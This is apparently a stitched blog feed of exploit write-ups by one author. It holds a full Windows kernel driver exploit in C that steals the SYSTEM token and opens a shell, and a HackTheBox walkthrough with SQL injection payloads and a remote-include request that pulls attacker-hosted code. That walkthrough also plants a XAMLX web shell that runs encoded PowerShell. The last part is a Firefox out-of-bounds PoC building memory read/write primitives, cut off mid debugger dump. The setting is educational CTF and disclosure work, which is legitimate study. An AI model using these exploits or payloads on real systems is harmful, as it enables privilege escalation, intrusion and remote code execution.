At this point, we know what our input buffer should look like to get an arbitrary memory mapping and we can continue with the exploitation section.
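What we learned from the trace can be summarized as a small model of the input buffer. This is a sketch based only on the register values observed above: the third QWORD ends up as VirtualAddress and the lower 32 bits of the second QWORD as Length. The role of the first QWORD is not established here, and the function names are made up for illustration.

```python
import struct


def build_request(length, virtual_address, first_qword=0x4141414142424242):
    """Lay out the first three QWORDs of the input buffer."""
    size_qword = (0x43434343 << 32) | (length & 0xFFFFFFFF)
    return struct.pack("<3Q", first_qword, size_qword, virtual_address)


def arguments_seen_by_driver(request):
    """Return (VirtualAddress, Length) as they showed up in RCX and RDX."""
    _first, size_qword, virtual_address = struct.unpack_from("<3Q", request)
    return virtual_address, size_qword & 0xFFFFFFFF


traced = struct.pack("<3Q", 0x4141414142424242, 0x4343434344444444, 0x4545454546464646)
print([hex(v) for v in arguments_seen_by_driver(traced)])
print(build_request(0x1000, 0xFFFF850120CAB040).hex())
```

For a useful request, the marker values are replaced by a sane length such as 0x1000 and a valid kernel address.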

Exploitation

After having discovered the vulnerable IOCTL it’s time to start the exploitation process. Assuming we can map any kernel virtual address into a user-mode address – what could a good target be? A commonly used payload for kernel exploits is token stealing shellcode. We do not really need shellcode for escalating privileges though because we can copy the token of a SYSTEM process to our current process using the mapping mechanism as a read/write primitive (data-only attack). Executing shellcode is also possible but not in scope for this post. The plan of attack is as follows:

  • Get the address of a SYSTEM process and read the Token pointer
  • Get the address of our current process and overwrite the Token pointer with the one from the SYSTEM process

We can use NtQuerySystemInformation to get the address of a SYSTEM process in memory without using any exploit. We are then going to use our mapping primitive to map the memory where the process is located to a user-mode address. This allows us to read the fields of the EPROCESS structure including the Token, UniqueProcessId and ActiveProcessLinks, of which we can get offsets via the debugger:

1: kd> dt _EPROCESS
ntdll!_EPROCESS
   ....
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   ...
   +0x4b8 Token            : _EX_FAST_REF
   ...
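With these offsets, reading the fields from a mapped copy of the structure is plain offset arithmetic. The sketch below works on a synthetic byte buffer with made-up values, not on real kernel memory. It assumes the offsets shown above (which differ between Windows builds), that Flink points at the ActiveProcessLinks field of the next process, and that the low 4 bits of an _EX_FAST_REF on x64 hold a reference count.

```python
import struct

# Offsets from the `dt _EPROCESS` output above (build specific).
OFF_PID = 0x440
OFF_LINKS = 0x448
OFF_TOKEN = 0x4B8


def read_qword(blob, offset):
    return struct.unpack_from("<Q", blob, offset)[0]


def parse_eprocess(blob):
    """Extract the fields of interest from a snapshot of an _EPROCESS."""
    flink = read_qword(blob, OFF_LINKS)
    return {
        "pid": read_qword(blob, OFF_PID),
        # Flink points into the next structure, so subtract the field offset.
        "next_eprocess": flink - OFF_LINKS,
        # Strip the reference count bits from the fast reference.
        "token": read_qword(blob, OFF_TOKEN) & ~0xF,
    }


# Synthetic snapshot with made-up values, for illustration only.
fake = bytearray(0x500)
struct.pack_into("<Q", fake, OFF_PID, 4)
struct.pack_into("<Q", fake, OFF_LINKS, 0xFFFF850120D00448)
struct.pack_into("<Q", fake, OFF_TOKEN, 0xFFFF9A0011223347)
info = parse_eprocess(bytes(fake))
print({name: hex(value) for name, value in info.items()})
```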

We update the PoC to map the SYSTEM process and verify that the data in the mapped area and at the original virtual address are indeed the same:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize (1024 * 1024 * 2)

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLength = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
    // Assumption: the first entry of the handle table references the EPROCESS of the System process.
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = handleTableInformation->Handles[0];
    QWORD object = (QWORD)handleInfo.Object;
    HeapFree(GetProcessHeap(), 0, handleTableInformation);
    return object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %lu\n", GetLastError());
        exit(1);
    }       

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    printf("System Process: %llx\n", systemProc);

    QWORD systemProcMap = mapArbMem(systemProc, hDriver);    
    printf("System Process Mapping: %llx\n", systemProcMap);

    getchar();
    DebugBreak();
    return 0;
}

The getchar() gives us the chance to copy the addresses out and the DebugBreak() conveniently breaks in the context of our process.

[>] Exploiting driver..
System Process: ffff850120cab040
System Process Mapping: 1ce40870040
...
1: kd> dq ffff850120cab040
ffff8501`20cab040  00000000`00000003 ffff8501`20cab048
ffff8501`20cab050  ffff8501`20cab048 ffff8501`20cab058
1: kd> dq 1ce40870040
000001ce`40870040  00000000`00000003 ffff8501`20cab048
000001ce`40870050  ffff8501`20cab048 ffff8501`20cab058

As expected, we got a mapping of the target address. We did not cover the output buffer yet: if we inspect it after triggering the IOCTL with valid arguments, we get something like the following back, which has the mapped user-mode address as the 3rd value:

 ffff850127c16970 4343434300001000 1ce40870040 00000000 ...
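As a quick sanity check, the mapped address and the original one should share the same offset within their page, since only whole pages are remapped. A short sketch using the values from the output above:

```python
PAGE_MASK = 0xFFF

original = 0xFFFF850120CAB040
out_line = "ffff850127c16970 4343434300001000 1ce40870040"

# The third QWORD of the output buffer is the new user-mode address.
values = [int(token, 16) for token in out_line.split()]
mapped = values[2]

same_offset = (original & PAGE_MASK) == (mapped & PAGE_MASK)
print(hex(mapped), hex(mapped & PAGE_MASK), same_offset)
```

Both addresses end in 0x040, which matches the two dq outputs shown earlier.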

At this point, all that is left to do is read the SYSTEM token and then iterate through the ActiveProcessLinks linked list until we find our own process. When we find it, we overwrite our own Token with the SYSTEM one and are done. The final exploit implementing this can be found below:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Author: @xct_de
// Target: Windows 11 (10.0.22000)

#define QWORD ULONGLONG
#define IOCTL_01 0x9C406500

#define SystemHandleInformation 0x10
#define SystemHandleInformationSize (1024 * 1024 * 2)

using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval
);

QWORD getSystemEProcess() {
    ULONG returnLength = 0;
    fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
    // The object behind the first handle entry is taken to be the SYSTEM process (EPROCESS)
    SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
    return (QWORD)handleInfo.Object;
}

QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
    DWORD index = 0;
    DWORD bytesWritten = 0;
    LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    QWORD* in = (QWORD*)((QWORD)uInBuf);
    *(in + index++) = 0x4141414142424242;
    *(in + index++) = 0x4343434300001000; // size
    *(in + index++) = addr;               // addr

    DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
    QWORD* out = (QWORD*)((QWORD)uOutBuf);
    QWORD mapped = *(out + 2);
    return mapped;
}

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %lu\n", GetLastError());
        exit(1);
    }    

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    QWORD systemProcMap = mapArbMem(systemProc, hDriver);
    QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8));
    printf("[>] System Token: 0x%llx\n", systemToken);

    DWORD currentProcessPid = GetCurrentProcessId();
    BOOL found = false;
    QWORD cMapping = systemProcMap;
    DWORD cPid = 0;
    QWORD cTokenPtr = 0;
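    while (!found) {
        // Follow ActiveProcessLinks (+0x448) and map the next EPROCESS into our process
        QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448));
        cMapping = mapArbMem(readAt - 0x448, hDriver);
        cPid = (DWORD)(*(DWORD*)(cMapping + 0x440));      // UniqueProcessId
        cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8)); // Token, saved so it can be restored later
        if (cPid == currentProcessPid) {
            found = true;
            break;
        }
    }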
    if (!found) {
        exit(-1);
    }
    printf("[>] Stealing Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = systemToken;
    system("cmd");
    printf("[>] Restoring Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = cTokenPtr;
    return 0;
}

SYSTEM \o/
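
The list walk in main() can be tried out without a driver. The following is a minimal sketch in JavaScript that models kernel memory as a Map. The offsets are the ones used in the exploit above, while the addresses, PIDs and token values are made up, and the real list also contains the PsActiveProcessHead entry, which this toy model leaves out.

```javascript
// Toy model of the list walk: a Map stands in for kernel memory.
// Offsets come from the exploit; addresses, PIDs and tokens are invented.
const PID_OFF = 0x440n, LINKS_OFF = 0x448n, TOKEN_OFF = 0x4b8n;
const mem = new Map();

const procs = [
    { base: 0x10000n, pid: 4n, token: 0xaaaan },    // stands in for SYSTEM
    { base: 0x20000n, pid: 1234n, token: 0xbbbbn },
    { base: 0x30000n, pid: 5678n, token: 0xccccn }, // "our" process
];
procs.forEach((p, i) => {
    mem.set(p.base + PID_OFF, p.pid);
    mem.set(p.base + TOKEN_OFF, p.token);
    // The forward link points at the links field of the next entry, not at its base.
    const next = procs[(i + 1) % procs.length];
    mem.set(p.base + LINKS_OFF, next.base + LINKS_OFF);
});

function findProcess(startBase, wantedPid) {
    let cur = startBase;
    do {
        if (mem.get(cur + PID_OFF) === wantedPid) return cur;
        cur = mem.get(cur + LINKS_OFF) - LINKS_OFF; // back to the record base
    } while (cur !== startBase); // stop after one full lap
    return null;
}

const ours = findProcess(0x10000n, 5678n);
mem.set(ours + TOKEN_OFF, mem.get(0x10000n + TOKEN_OFF)); // the "token steal"
console.log(mem.get(ours + TOKEN_OFF).toString(16)); // aaaa
```

Unlike the loop in the exploit, this version stops after one lap around the list, so a PID that is never found ends the search instead of spinning forever.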

I reported the vulnerability to SSD which then contacted the vendor. Unfortunately, the vendor never responded.

The post Windows Kernel Exploitation – Arbitrary Memory Mapping (x64) appeared first on Vulndev.

SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox

By: xct
17 September 2022 at 14:24

Video & additional notes for StreamIO, a medium difficulty Windows machine on HackTheBox that involves manual MSSQL Injection, going from file inclusion to RCE and in this case getting the SeImpersonate privilege back to get SYSTEM via an EFS-based potato.

SQLi

q=admin' union select 1,2,3,4,5-- 
q=admin' union select 1,2,3,4,5,6-- 
q=admin' union select 1,@@version,3,4,5,6--  
q=admin' union select 1, STRING_AGG(name, ', '),3,4,5,6 from master..sysdatabases--
q=admin' union select 1, STRING_AGG(name, ', '),3,4,5,6 from  master..sysobjects WHERE xtype = 'U'--
q=admin' union select 1, STRING_AGG(CONCAT(table_name,'.',column_name), ', '),3,4,5,6 from  information_schema.columns--

RCE

# Content of "x", hosted on the attacker machine
system("powershell -exec bypass -enc JAB...");

# Request
curl -H 'Cookie: PHPSESSID=r3apd30esr2a8c1kt0vfnmd6qn' -sk -X POST -d 'include=http://10.10.14.9/x' https://streamio.htb/admin/?debug=master.php

XAMLX & Web.config to RCE

Web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
 <system.webServer>
 <handlers accessPolicy="Read, Script, Write">
 <add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
 <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
 </handlers>
 <validation validateIntegratedModeConfiguration="false" />
 </system.webServer>
</configuration>

Shell.xaml

<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
 <p:Sequence DisplayName="Sequential Service">
 <TransactedReceiveScope Request="{x:Reference __r0}">
 <p1:Sequence >
 <SendReply DisplayName="SendResponse" >
 <SendReply.Request>
 <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
 </SendReply.Request>
 <SendMessageContent>
 <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c powershell -exec bypass -enc JAB...").toString()]</p1:InArgument>
 </SendMessageContent>
 </SendReply>
 </p1:Sequence>
 </TransactedReceiveScope>
 </p:Sequence>
</WorkflowService>

Trigger

POST /test.xamlx HTTP/1.1
Host: 10.10.11.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
SOAPAction: testme
Content-Length: 88

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>

Resources


Browser Exploitation: Firefox OOB to RCE

By: xct
9 September 2022 at 11:19

Intro

In this post, we will exploit Midenios, a good introductory browser exploitation challenge that was originally used for the HackTheBox Business-CTF. I had some experience exploiting IE/Edge/Chrome before, but exploiting Firefox was mostly new to me. I solved this challenge well after the CTF, so I had some existing write-ups to fall back on. Many excellent resources helped with developing the exploit; here are some of them:

Definitely check out the write-up by 0xten, because it follows a different exploitation path after obtaining the read/write primitive. Since it’s been a long time since I did anything with Firefox, there might be some inaccuracies. If you find something, please let me know; I want to learn more 🙂

Vulnerability

The challenge itself has a website that allows you to submit unsanitized HTML input which is later visited by a bot. We can submit script tags to achieve a “persistent” XSS: <script src="http://127.0.0.1/exploit.js"></script>. The bot uses a vulnerable, custom-patched version of Firefox to visit the page and executes the user-provided JavaScript.

Besides the website, we are provided an archive that contains a “patch.diff”, which shows the changes made to the code base, and a “mozconfig”, which shows that debug mode is enabled.

mozconfig

ac_add_options --enable-debug

patch.diff (shortened and commented, all changes to js/src/vm/ArrayBufferObject.cpp, js/src/vm/ArrayBufferObject.h):

# added a setter for byteLength 
-    JS_PSG("byteLength", ArrayBufferObject::byteLengthGetter, 0),
+    JS_PSGS("byteLength", ArrayBufferObject::byteLengthGetter, ArrayBufferObject::byteLengthSetter, 0),


# added implementation for the byteLength setter
+MOZ_ALWAYS_INLINE bool ArrayBufferObject::byteLengthSetterImpl(
+    JSContext* cx, const CallArgs& args) {
+  MOZ_ASSERT(IsArrayBuffer(args.thisv()));
+
+  // Steps 1-2
+  auto* buffer = &args.thisv().toObject().as<ArrayBufferObject>();
+  if (buffer->isDetached()) {
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 3
+  double targetLength;
+  if (!ToInteger(cx, args.get(0), &targetLength)) {
+    return false;
+  }
+
+  if (buffer->isDetached()) { // Could have been detached during argument processing
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 4
+  buffer->setByteLength(targetLength);
+
+  args.rval().setUndefined();
+  return true;
+}


# removed length sanity check
void ArrayBufferObject::setByteLength(size_t length) {
-  MOZ_ASSERT(length <= maxBufferByteLength());
+//  MOZ_ASSERT(length <= maxBufferByteLength());
   setFixedSlot(BYTE_LENGTH_SLOT, PrivateValue(length));
}

We can see that a new setter was added that allows setting byteLength on an ArrayBuffer, and that the assertion checking that the length does not exceed maxBufferByteLength was commented out. Without reading everything in the patch diff, we can already assume that we will have to create an ArrayBuffer object and then set its byteLength to a large value to achieve out-of-bounds memory access when accessing the contents of the ArrayBuffer.

Before trying to verify our assumption we have to create a debug environment to develop the exploit.

Preparing the debug environment

To quickly test our exploit without having to start Firefox itself, we can compile its JavaScript engine, SpiderMonkey, locally. We will do that both in debug and in release mode (the reason for both will become clear later):

rustup update
hg clone http://hg.mozilla.org/mozilla-central spidermonkey
cd spidermonkey

spidermonkey patch -p1 < ../pwn_midenios/src/diff.patch
patching file js/src/vm/ArrayBufferObject.cpp
Hunk #1 succeeded at 325 (offset -11 lines).
Hunk #2 succeeded at 366 (offset -11 lines).
Hunk #3 succeeded at 1031 (offset -7 lines).
patching file js/src/vm/ArrayBufferObject.h
Hunk #1 succeeded at 167 (offset 1 line).
Hunk #2 succeeded at 339 (offset 1 line).

cd spidermonkey/js/src
mkdir build_DBG.OBJ
cd build_DBG.OBJ
../configure --enable-debug --disable-optimize
make -j8

cd ..
mkdir build.OBJ
cd build.OBJ
../configure --disable-debug --disable-optimize
make -j8

After compiling both versions, we can find the js executable in both build directories in dist/bin/. For debugging I will use gdb with GEF (https://hugsy.github.io/gef/). Now that we have our environment set up, we can write a simple PoC that does an out-of-bounds read.

We define an ArrayBuffer “A” and use the new byteLength setter to put a large value there. We then create another ArrayBuffer “B” just to have an adjacent object in memory (it will be placed exactly next to the first one). Then we create a TypedArray (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray) from our ArrayBuffer. This is done so we can access the contents of the underlying binary buffer as an array.

Finally, we try to dump the contents of “A”, which is only defined up to the 10th iteration (we set the size to 80, so ten 8-byte values). However, due to our manipulated byte length, we can now print beyond that boundary and dump the memory of the adjacent object “B”.

Poc_0x01.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n


// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBuf = new BigUint64Array(bBuf)
bBuf[0] = 0x4242424242424242n

// access A as a TypedArray out of bounds to read some metadata/data of B
for(let i=0;i<20;i++){
    console.log(`${i} ${aBuf[i].toString(16)}`)
}

Running the PoC shows that we can indeed access beyond the size of the ArrayBuffer and see memory that does not belong to it:

spidermonkey/js/src/build_DBG.OBJ/dist/bin/js -i pwn_0x01.js
0 4141414141414141
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 fffe4d4d4d4d4d4d
11 fffe4d4d4d4d4d4d
12 58dcd466700
13 5618d8518088
14 5618d8517828
15 58dcd46a160
16 50
17 fffe3ee4bd6007e0
18 fff8800000000000
19 4242424242424242

Obtaining a read/write primitive

So what are these values? Let’s have a look in gdb at “A” first (which is a TypedArray):

gdb -p $(pidof js)

gef➤  grep 0x4141414141414141
[+] Searching '\x41\x41\x41\x41\x41\x41\x41\x41' in memory
[+] In (0x58dcd400000-0x58dcd500000), permission=rw-
  0x58dcd469038 - 0x58dcd469040  →   "AAAAAAAA"
  0x58dcd46a0c8 - 0x58dcd46a0d0  →   "AAAAAAAA"
[+] In (0x3ee4bd600000-0x3ee4bd700000), permission=rw-
  0x3ee4bd600848 - 0x3ee4bd600868  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7f4343996000-0x7f43439ee000), permission=r--
  0x7f43439bc440 - 0x7f43439bc460  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc448 - 0x7f43439bc468  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc450 - 0x7f43439bc470  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc458 - 0x7f43439bc478  →   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"


gef➤  x/40xg 0x58dcd46a0c8-0x40
0x58dcd46a088:    0x0000000000000000                  0x0000058dcd466700 (*shape)
0x58dcd46a098:    0x00005618d8518088 (*slots)         0x00005618d8517828 (*elementsHdr)
0x58dcd46a0a8:    0x0000058dcd46a0c8 (*elementsData)  0x00000000000003e8 (byteLength)
0x58dcd46a0b8:    0xfffe3ee4bd6007a0 (*typedArray)    0xfff8800000000000 (offset)
0x58dcd46a0c8:    0x4141414141414141 (data start)     0x0000000000000000 
0x58dcd46a0d8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0e8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0f8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a108:    0x0000000000000000                  0x0000000000000000 (data end)
0x58dcd46a118:    0xfffe4d4d4d4d4d4d                  0xfffe4d4d4d4d4d4d
0x58dcd46a128:    0x0000058dcd466700                  0x00005618d8518088
0x58dcd46a138:    0x00005618d8517828                  0x0000058dcd46a160 
0x58dcd46a148:    0x0000000000000050                  0xfffe3ee4bd6007e0
0x58dcd46a158:    0xfff8800000000000                  0x4242424242424242 
...

We can relatively easily find the same values in gdb by grepping for 0x4141414141414141, which we placed as the first value in the “A” array. To understand what these values are, we have to look at how these objects work internally. I annotated the first object in the debug view above to show what some of these values represent.

The structure we see here is based on a NativeObject, which most JavaScript objects inherit from (in the source it does not look exactly like this, but it helps in understanding the layout: https://searchfox.org/mozilla-central/source/js/src/vm/NativeObject.h#547). I tried to illustrate the memory layout below (some of the names I made up):

---[Meta Data]---
*shape
*slots
*elementsHeader
*elementsData  --------------
byteLength                   |
*typedArrayObj               |
offset                       |
---[Data]---                 |
0x414141414141         <-----
...

shape: Points to names of properties and corresponding indices into the slots array.

slots: Points to an array of values for properties. Here: emptyObjectSlotsHeaders.

elementsHeader: Here emptyElementsHeader.

elementsData: Points to the data (our array contents).

byteLength: The byteLength we can set via the vulnerable setter.

typedArrayObj: This is a tagged pointer that is pointing to the BigUint64Array Metadata.

offset: Contains 0xfff8800000000000 which is the value zero, type tagged as an integer.
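
To make the tagged values less opaque, here is a minimal sketch that splits a boxed 64-bit value into tag and payload. It assumes that SpiderMonkey on 64-bit keeps the type tag in the upper 17 bits and the payload in the lower 47 bits; that split is an assumption that happens to fit the two values from the dump, not something the patch itself shows. The helper name splitBoxed is made up.

```javascript
// Split a boxed 64-bit value into tag bits and payload.
// Assumption: 17 tag bits on top, 47 payload bits below.
const TAG_SHIFT = 47n;
const PAYLOAD_MASK = (1n << TAG_SHIFT) - 1n;

function splitBoxed(value) {
    return {
        tag: value >> TAG_SHIFT,
        payload: value & PAYLOAD_MASK,
    };
}

// typedArrayObj from the dump: an object tag plus a heap pointer
const typedArrayObj = splitBoxed(0xfffe3ee4bd6007a0n);
console.log(typedArrayObj.tag.toString(16), typedArrayObj.payload.toString(16));

// offset from the dump: an integer tag with payload zero
const offset = splitBoxed(0xfff8800000000000n);
console.log(offset.tag.toString(16), offset.payload.toString(16));
```

For object pointers like the first value, bit 47 is clear, so masking with 0xffffffffffff (48 bits) yields the same payload.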

More detailed information can be found in this post: https://vigneshsrao.github.io/posts/play-with-spidermonkey/. The most important value, for now, is the data pointer (here: 0x0000058dcd46a0c8), which points to the actual data being stored in the ArrayBuffer. Since we set the length of ArrayBuffer “A” to 1000, we can read or write any of the 125 (1000/8) 8-byte values starting at its data pointer. If we overwrite the data pointer of ArrayBuffer “B” with a location where we want to read or write, we can then simply index into “B” to read or write anywhere in the process’s memory.

Let’s test this assumption and create some helper functions read64 and write64. Both functions use the out-of-bounds write we achieved via “A” to set the data pointer of “B” to a location of our choice. We then either read or set the value by indexing into “B” as a TypedArray.

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)
bBufTyped[0] = 0x4242424242424242n
bBufTyped[1] = 0x4343434343434343n


function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // return first element (exactly where the changed data pointer points to)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray so we can store a 64 bit value
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}
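
The index 15 used in both helpers is not magic; it follows from the addresses in the first gdb dump. A small sketch of that arithmetic (the variable names are made up, the addresses are copied from the dump):

```javascript
// Addresses copied from the first gdb dump.
const aDataStart = 0x58dcd46a0c8n;  // first element of A
const bSlotsField = 0x58dcd46a130n; // where B's slots pointer is stored
const bDataField = 0x58dcd46a140n;  // where B's elementsData pointer is stored

// Index into A (as BigUint64Array) that lands on a given address.
const indexOf = (fieldAddr) => (fieldAddr - aDataStart) / 8n;

console.log(indexOf(bSlotsField)); // 13n
console.log(indexOf(bDataField));  // 15n
console.log(1000n / 8n);           // 125n, number of reachable elements
```

This matches the PoC output, where index 13 printed 5618d8518088 and index 15 printed 58dcd46a160.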

Let’s test the read primitive by reading some values from pointers we see in gdb:

0x3f20d3c6a098: 0x000055fd568dc088  0x000055fd568db828
0x3f20d3c6a0a8: 0x00003f20d3c6a0c8  0x00000000000003e8
0x3f20d3c6a0b8: 0xfffe09cda9d007e0  0xfff8800000000000
0x3f20d3c6a0c8: 0x4141414141414141  0x0000000000000000
0x3f20d3c6a0d8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0e8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0f8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a108: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160
